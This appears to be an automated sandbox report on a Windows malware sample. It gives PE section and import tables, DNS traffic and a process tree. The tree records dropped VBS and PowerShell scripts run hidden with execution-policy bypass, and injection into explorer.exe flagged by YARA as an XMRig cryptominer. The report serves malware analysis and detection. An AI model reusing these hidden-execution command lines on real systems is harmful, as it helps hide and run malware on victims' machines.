xor r9, rdx
mov rcx, r9
pop rbx
jmp 00007F19F0D9D664h
int3
int3
int3
mov rax, rsp
mov qword ptr [rax+08h], rbx
mov qword ptr [rax+10h], rbp
mov qword ptr [rax+18h], rsi
mov qword ptr [rax+20h], rdi
push r14
sub rsp, 20h
mov rbx, qword ptr [r9+38h]
mov rsi, rdx
mov r14, r8
mov rbp, rcx
mov rdx, r9
mov rcx, rsi
mov rdi, r9
lea r8, qword ptr [rbx+04h]
call 00007F19F0D9DF01h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x75bdc | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x85000 | 0x79424c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x7b000 | 0x39e4 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x81a000 | 0x1120 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x6b210 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x6b380 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x6b280 | 0x94 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x56000 | 0x318 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x545dc | 0x54600 | e0fb476963c61d79a0e4d1f8cdda2680 | False | 0.47759259259259257 | data | 6.521391194972824 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x56000 | 0x2064c | 0x20800 | f8856360932ec81157aa09db5dbf2e4f | False | 0.3951021634615385 | data | 4.828411829352243 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x77000 | 0x386c | 0x2000 | 1e366a8d51f484097e110da8aba0457a | False | 0.15283203125 | DOS executable (block device driver) | 3.627166240806781 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x7b000 | 0x39e4 | 0x3a00 | 7de2ca4768d13ee483f167eda17087b8 | False | 0.49986530172413796 | data | 5.743669795175902 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.gfids | 0x7f000 | 0x788 | 0x800 | 5a004955d5c5111a6a2d62a167881cbe | False | 0.34228515625 | data | 3.590485572918061 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls | 0x80000 | 0x9 | 0x200 | 1f354d76203061bfdd5a53dae48d5435 | False | 0.033203125 | data | 0.020393135236084953 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.gxfg | 0x81000 | 0x2450 | 0x2600 | dba415d40ec4ebcadeadeedd849c281f | False | 0.42465049342105265 | data | 5.029209810777076 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.gehcont | 0x84000 | 0x20 | 0x200 | 82ab971502982c7237d57054e6561745 | False | 0.064453125 | data | 0.16299007530476972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x85000 | 0x79424c | 0x794400 | 396d6234ba00d269a108f1c9cf01e0a7 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x81a000 | 0x1120 | 0x1200 | 6f89167d5e4b33c4dada7a557c7ba933 | False | 0.3630642361111111 | data | 5.348115706979858 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                RT_ICON | 0x85328 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.3581081081081081
                                RT_ICON | 0x85450 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.21676300578034682
                                RT_ICON | 0x859b8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.3467741935483871
                                RT_ICON | 0x85ca0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.5388086642599278
                                RT_ICON | 0x86548 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.2603658536585366
                                RT_ICON | 0x86bb0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.47761194029850745
                                RT_ICON | 0x87a58 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.22695035460992907
                                RT_ICON | 0x87ec0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.4219043151969981
                                RT_ICON | 0x88f68 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.30933609958506225
                                RT_ICON | 0x8b510 | 0x77e0 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9911040145985401
                                RT_RCDATA | 0x92cf0 | 0x786000 | AmigaOS outline font | English | United States | 0.8973264694213867
                                RT_GROUP_ICON | 0x818cf0 | 0x92 | data | English | United States | 0.6506849315068494
                                RT_VERSION | 0x818d84 | 0x348 | data | | | 0.4714285714285714
                                RT_MANIFEST | 0x8190cc | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
                                DLL | Import
                                SHLWAPI.dll | PathRemoveFileSpecW
                                KERNEL32.dll | InitializeSListHead, WriteConsoleW, SizeofResource, GetModuleFileNameW, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, GetModuleHandleW, FreeLibrary, WideCharToMultiByte, HeapSize, CreateFileW, MultiByteToWideChar, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, CloseHandle, SetEvent, ResetEvent, WaitForSingleObjectEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, SetEndOfFile, RtlPcToFileHeader, RaiseException, RtlUnwindEx, GetLastError, LoadLibraryExW, HeapAlloc, HeapReAlloc, HeapFree, ExitProcess, GetModuleHandleExW, GetStdHandle, WriteFile, GetFileSizeEx, SetFilePointerEx, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, ReadFile, GetProcessHeap, GetTimeZoneInformation, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, ReadConsoleW
                                SHELL32.dll | SHGetKnownFolderPath
                                Language of compilation system | Country where language is spoken
                                English | United States
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Oct 28, 2024 09:45:24.285212994 CET | 53 | 63044 | 1.1.1.1 | 192.168.2.5
                                Oct 28, 2024 09:45:51.034724951 CET | 53 | 49197 | 162.159.36.2 | 192.168.2.5
                                Oct 28, 2024 09:45:51.709220886 CET | 53 | 60980 | 1.1.1.1 | 192.168.2.5

                                Target ID:0
                                Start time:04:45:03
                                Start date:28/10/2024
                                Path:C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe"
                                Imagebase:0x7ff77acc0000
                                File size:8'467'456 bytes
                                MD5 hash:58819721CBC16EA7033BE23E69BD2058
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Target ID:4
                                Start time:04:45:05
                                Start date:28/10/2024
                                Path:C:\Windows\System32\WerFault.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\WerFault.exe -u -p 3500 -s 592
                                Imagebase:0x7ff69e4f0000
                                File size:570'736 bytes
                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:5
                                Start time:04:45:06
                                Start date:28/10/2024
                                Path:C:\Windows\System32\wscript.exe
                                Wow64 process (32bit):false
                                Commandline:wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
                                Imagebase:0x7ff6033b0000
                                File size:170'496 bytes
                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:7
                                Start time:04:45:06
                                Start date:28/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
                                Imagebase:0x7ff7be880000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:8
                                Start time:04:45:07
                                Start date:28/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:9
                                Start time:04:45:10
                                Start date:28/10/2024
                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline"
                                Imagebase:0x7ff769b80000
                                File size:2'759'232 bytes
                                MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:10
                                Start time:04:45:10
                                Start date:28/10/2024
                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC35E.tmp" "c:\Users\user\AppData\Local\Temp\CSCD0EB64BB52C94309A29EE6B778E205.TMP"
                                Imagebase:0x7ff752e70000
                                File size:52'744 bytes
                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:11
                                Start time:04:45:14
                                Start date:28/10/2024
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Explorer.EXE
                                Imagebase:0x7ff674740000
                                File size:5'141'208 bytes
                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000002.3351232614.0000000010E18000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000002.3351484590.0000000020D39000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000002.3355532590.000000002ACB0000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000002.3353156296.00000000297B0000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000002.3351232614.0000000010D31000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000000.2175693198.0000000010630000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000002.3353996348.0000000029EB0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000002.3352354318.00000000290B9000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000002.3354872817.000000002A5BB000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000002.3350741583.0000000010630000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:false

                                Target ID:12
                                Start time:04:45:15
                                Start date:28/10/2024
                                Path:C:\Windows\System32\wscript.exe
                                Wow64 process (32bit):false
                                Commandline:wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
                                Imagebase:0x7ff6033b0000
                                File size:170'496 bytes
                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:13
                                Start time:04:45:15
                                Start date:28/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
                                Imagebase:0x7ff7be880000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:14
                                Start time:04:45:15
                                Start date:28/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Target ID:15
                                Start time:04:45:15
                                Start date:28/10/2024
                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\spoxiyrj.cmdline"
                                Imagebase:0x7ff769b80000
                                File size:2'759'232 bytes
                                MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:16
                                Start time:04:45:16
                                Start date:28/10/2024
                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDA71.tmp" "c:\Users\user\AppData\Local\Temp\CSC30DB8E40DC954A908A17CE354256952F.TMP"
                                Imagebase:0x7ff752e70000
                                File size:52'744 bytes
                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ;P_
                                  • API String ID: 0-3238953
                                  • Opcode ID: 4c27f7ffadabbe060c56d4a8c88837eff56b7a1de1902602d1cfbd4c9874a416
                                  • Instruction ID: d47f6410244194e686d38b3efe8f030b8a3a2fc853e5622b686a9053ed01358c
                                  • Opcode Fuzzy Hash: 4c27f7ffadabbe060c56d4a8c88837eff56b7a1de1902602d1cfbd4c9874a416
                                  • Instruction Fuzzy Hash: 00518F21E1EA469FEF44FB7898552BE77A2FF88640F544479D009C76DBDD2CA802CB90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @T]G
                                  • API String ID: 0-910751335
                                  • Opcode ID: 5262f393e03e8f762cf0ed64498804a4a5b3788f623161113ae73d91c2135ae8
                                  • Instruction ID: e66fdeb542dfdd0bcdaef22d116b74f0f082494b620e1ed5432cd3d8ebc500dc
                                  • Opcode Fuzzy Hash: 5262f393e03e8f762cf0ed64498804a4a5b3788f623161113ae73d91c2135ae8
                                  • Instruction Fuzzy Hash: F5314831E2D68E9FDB59AA3C44450BEBBE1EF45252B2409BED48BC7487ED1858478360
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: P_^
                                  • API String ID: 0-571329226
                                  • Opcode ID: b527b8e73b6c4b0fad4141e63a36ed4ffada0b1a8f9741119092e4841683270f
                                  • Instruction ID: 08e599237ce1716a3042111e4808aaf330ab81e9fb992e4db70d79684cd841f4
                                  • Opcode Fuzzy Hash: b527b8e73b6c4b0fad4141e63a36ed4ffada0b1a8f9741119092e4841683270f
                                  • Instruction Fuzzy Hash: 06112B63E0D6C2DFFF15A67C68551B92F91EF917D532808B7C084878C3D81C284B8631
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @T]G
                                  • API String ID: 0-910751335
                                  • Opcode ID: ccb6d02fea3fdd1fce77efb8d72b18b19260c4e72b96a98287e29bbf75673313
                                  • Instruction ID: d8dbbde60599139ff7eecc039b8abc208db96edf4e34d42488d19fe618251e0c
                                  • Opcode Fuzzy Hash: ccb6d02fea3fdd1fce77efb8d72b18b19260c4e72b96a98287e29bbf75673313
                                  • Instruction Fuzzy Hash: A2F02771D0C44DAFEF54EB6C94841FDBBB1FF88240F6008B6D40DD6986ED2819824760
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e2a27ee437b66cb5b8725efedbce2951edefafb35d8f98c0b06c698a3e302368
                                  • Instruction ID: 2fc2f7b7262ba274542b33706fda955ecae3da82959edcc8f44d42b736c0173b
                                  • Opcode Fuzzy Hash: e2a27ee437b66cb5b8725efedbce2951edefafb35d8f98c0b06c698a3e302368
                                  • Instruction Fuzzy Hash: 85418F24E1EA4A9FDF45F7A888526BD7BA3FF89240F0404B9D009D76D7DD2C68028F50
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: da244ca0ad64aaa74092353454ea6f8f53434b5e813fa78915cbbd90dd37d2e1
                                  • Instruction ID: b3e0639fead0d550015330e32ef59dfe23989d05ca4c704e4b0d5a0b02e1ed8d
                                  • Opcode Fuzzy Hash: da244ca0ad64aaa74092353454ea6f8f53434b5e813fa78915cbbd90dd37d2e1
                                  • Instruction Fuzzy Hash: 6AC1F060E1EE0A9FEF94F768849567962D2FF88781F640474D00EC76E6DE2CBC429B50
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 41f2c457c66a140d9a7bddf2bd2a843375799269da90e712783fb19992db6e28
                                  • Instruction ID: caa6e90df433d26f14a2c00f40c6b04542dc1230e0670dfaeffb8e234a67a322
                                  • Opcode Fuzzy Hash: 41f2c457c66a140d9a7bddf2bd2a843375799269da90e712783fb19992db6e28
                                  • Instruction Fuzzy Hash: 5E510630B1D9499FEB8CFB2C98596B963D2FF89741B5000B9E04EC72A7DD1CAC428B51
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7f3c66bbedd7d0efc729c935bad37a837e51961d066296de98459fb310bdb782
                                  • Instruction ID: 35a4a187df428a4028984638b74d3b6f7ad1575607c75d2dbe0d8a20629a93c8
                                  • Opcode Fuzzy Hash: 7f3c66bbedd7d0efc729c935bad37a837e51961d066296de98459fb310bdb782
                                  • Instruction Fuzzy Hash: 99513E60F2ED0A9FEBA4F728C45567962D2EF85781F4404B5E00DC72E6DE6CAC429B50
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 31786561cd3c20f43cb32ae62abde6d0274abfc4fec0c98f2bb0512a08d0c706
                                  • Instruction ID: 7ebfd0c4d633d5fb044864977e8721636e79222b76b450223e51beef656ccb69
                                  • Opcode Fuzzy Hash: 31786561cd3c20f43cb32ae62abde6d0274abfc4fec0c98f2bb0512a08d0c706
                                  • Instruction Fuzzy Hash: 4241FC64F1EE0A9FDB54F728889666973D3EB9874175404B4E409D32A6DE2CAC429F40
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ade19cb910dc79792ae52efeb4379e103db6c2738cadca7e11823d9804031c01
                                  • Instruction ID: 588d47ff43f10125c6744bd53271c1782abee68506d4282bf8098ab623f160eb
                                  • Opcode Fuzzy Hash: ade19cb910dc79792ae52efeb4379e103db6c2738cadca7e11823d9804031c01
                                  • Instruction Fuzzy Hash: 37313A61A0EB864FEF49B73858551BC7BD2EF86240F0504BED44EC71E7DD2DA8468321
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a0207ff4e643aac6c3e9e190da2ad10331098a38807c234451f8ece4d5612c74
                                  • Instruction ID: cc6d803b03977634f4d1af51a5cffcc3fe488b1e2f322802e6049d49f83b50e3
                                  • Opcode Fuzzy Hash: a0207ff4e643aac6c3e9e190da2ad10331098a38807c234451f8ece4d5612c74
                                  • Instruction Fuzzy Hash: 1F31F670A1E68A9FEF49BB7848656FC77D2EF45281B0404BDD40EC76D7DD2CA8418720
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 70c5ddab8e0ea29341131b0f88b30349d334ba15a65d7497a2d3a78727bdb51d
                                  • Instruction ID: 32f4976c256811144d075cf6ac5afe2a04cefea1098aaaea9c33a4981d5ae7b8
                                  • Opcode Fuzzy Hash: 70c5ddab8e0ea29341131b0f88b30349d334ba15a65d7497a2d3a78727bdb51d
                                  • Instruction Fuzzy Hash: 38113C10A1E90ADFEE58B768446527D11D3FF88781F700438E40FC76DADD2CB8426B60
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3b16053fb8e5b373358ef57f91fdc4d1c464f411a8359ca62c400d468fb4dc29
                                  • Instruction ID: f70690c561b66be05b04e3f696d711aee8558c84e45915aee765d01b881f4e50
                                  • Opcode Fuzzy Hash: 3b16053fb8e5b373358ef57f91fdc4d1c464f411a8359ca62c400d468fb4dc29
                                  • Instruction Fuzzy Hash: 3F010460A1E90ADFEE58B758846567D11E3FF88781F744434D40FC76EADD2C7842AB60
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ca21d21f55aacbdcd557136247b9e9025406cb23a834d89a427ea6aae29935ba
                                  • Instruction ID: b957f19d07882dd56bdc51493311931fe71cc3afc3a22157e568b82cdc1f89ba
                                  • Opcode Fuzzy Hash: ca21d21f55aacbdcd557136247b9e9025406cb23a834d89a427ea6aae29935ba
                                  • Instruction Fuzzy Hash: 1BF0C924A1E90ADEEF58B758846567D11A3EF88781F744538D40EC36EADD2CB842AB20
                                  Memory Dump Source
